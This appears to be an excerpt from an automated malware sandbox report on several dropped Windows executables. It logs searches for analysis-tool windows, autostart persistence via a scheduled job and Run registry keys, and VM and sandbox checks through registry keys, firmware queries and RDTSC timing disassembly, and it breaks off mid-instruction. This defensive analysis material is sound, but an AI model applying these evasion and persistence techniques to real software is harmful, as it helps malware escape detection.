Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\DocumentsECBGHCGCBK.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28d9ab8742.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28d9ab8742.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3daf81f16e.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3daf81f16e.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run be33d1b9ea.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run be33d1b9ea.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CB355F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsECBGHCGCBK.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsECBGHCGCBK.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573885 second address: 573889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573889 second address: 5738B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FB438C61F2Ch 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB438C61F2Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5738B1 second address: 5738B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5738B7 second address: 5738C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB438C61F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5738C1 second address: 5738CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5738CD second address: 5738D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572A31 second address: 572A4D instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4390A66C0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572A4D second address: 572A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572EB9 second address: 572EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572EBF second address: 572EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572EC5 second address: 572EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573059 second address: 57308A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 js 00007FB438C61F26h 0x0000000f jmp 00007FB438C61F39h 0x00000014 pop ecx 0x00000015 jns 00007FB438C61F2Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573210 second address: 573214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5758A3 second address: 5758A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5758A9 second address: 5758AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5758AD second address: 5758E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movsx edi, dx 0x0000000e push 00000000h 0x00000010 or ecx, 07ECAF5Eh 0x00000016 call 00007FB438C61F29h 0x0000001b jo 00007FB438C61F36h 0x00000021 jmp 00007FB438C61F30h 0x00000026 push eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5758E8 second address: 5758FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5758FC second address: 575900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575900 second address: 575938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB4390A66C7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575938 second address: 57594F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB438C61F26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57594F second address: 575961 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB4390A66B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575A8A second address: 575A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575A8E second address: 575A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575A94 second address: 575A9E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438C61F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575A9E second address: 575B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D2BF9h], eax 0x0000000d push 00000000h 0x0000000f movsx edi, ax 0x00000012 call 00007FB4390A66B9h 0x00000017 pushad 0x00000018 jmp 00007FB4390A66C0h 0x0000001d jmp 00007FB4390A66C2h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FB4390A66C0h 0x0000002c jmp 00007FB4390A66C4h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575B06 second address: 575B33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB438C61F39h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FB438C61F26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575B33 second address: 575B49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575B49 second address: 575BE8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB438C61F34h 0x00000008 jmp 00007FB438C61F2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jne 00007FB438C61F32h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push edi 0x0000001c push edi 0x0000001d push eax 0x0000001e pop eax 0x0000001f pop edi 0x00000020 pop edi 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FB438C61F28h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c adc di, 1260h 0x00000041 mov dword ptr [ebp+122D371Ah], ebx 0x00000047 push 00000003h 0x00000049 mov ecx, dword ptr [ebp+122D2774h] 0x0000004f push 00000000h 0x00000051 jmp 00007FB438C61F38h 0x00000056 push 00000003h 0x00000058 js 00007FB438C61F2Eh 0x0000005e push ecx 0x0000005f sub dword ptr [ebp+122D1C82h], ebx 0x00000065 